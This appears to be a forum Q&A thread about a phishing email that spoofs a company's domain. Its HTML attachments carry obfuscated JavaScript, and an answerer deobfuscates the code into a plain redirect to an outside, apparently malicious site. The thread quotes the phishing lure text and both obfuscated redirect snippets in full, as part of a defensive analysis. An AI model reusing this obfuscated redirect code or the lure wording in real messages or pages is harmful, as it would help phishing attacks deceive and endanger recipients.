I've just found out that a spammer is sending email from our domain name, pretending to be us, saying:
Dear Customer,
This e-mail was send by ourwebsite.com to notify you that we have temporanly prevented access to your account.
We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.
(C) ourwebsite.com (I changed that)
The attached file is an HTML file that has the following javascript:
<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>
Another email had this:
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
Can anyone tells me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it ...
Thanks
The script executes
document.location.href = "http://mvblaw.com/z.htm"; //Evil site (I assume)
It also contains a large number of useless lines to hide the script's true purpose.
Here it is unpacked.
function mD() {};
this.aB = 43719;
mD.prototype = {
i: function () {
var w = new Date();
this.j = '';
var x = function () {};
var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
var d = new Date();
y = "";
aL = "";
var f = document;
var s = function () {};
this.yE = "";
aN = "";
var dL = '';
var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
this.v = "v";
var q = 27427;
var m = new Date();
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
dE = '';
k = "";
var qY = function () {};
}
};
xO = false;
var b = new mD();
yY = "";
b.i();
this.xT = '';
Cleaning up the obfuscations and adding meaningful names, it becomes
function TempClass() {};
this.aB = 43719;
TempClass.prototype = {
doIt: function () {
var w = new Date();
this.j = '';
var x = function () {};
var a = "http://mvblaw.com/z.htm"; //Evil site (I assume)
var d = new Date();
y = "";
aL = "";
var f = document;
var s = function () {};
this.yE = "";
aN = "";
var dL = '';
var iD = f['location'];
this.v = "v";
var q = 27427;
var m = new Date();
iD['href'] = a;
dE = '';
k = "";
var qY = function () {};
}
};
xO = false;
var b = new TempClass();
yY = "";
b.doIt();
this.xT = '';
Removing all of the useless lines, it becomes
function TempClass() {};
TempClass.prototype = {
doIt: function () {
var a = "http://mvblaw.com/z.htm"; //Evil site (I assume)
var f = document;
var iD = f['location'];
iD['href'] = a;
}
};
var b = new TempClass();
b.doIt();